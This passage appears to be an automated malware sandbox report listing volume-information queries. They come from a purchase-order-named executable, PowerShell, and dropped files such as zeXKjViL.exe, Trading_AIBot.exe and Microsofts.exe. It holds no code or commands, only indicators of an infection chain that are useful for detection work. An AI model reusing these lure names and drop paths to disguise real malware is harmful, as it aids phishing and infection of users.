Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Queries volume information: C:\Users\user\AppData\Roaming\zeXKjViL.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\alg.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\AppVClient.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Microsofts.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTFD83.tmp VolumeInformation
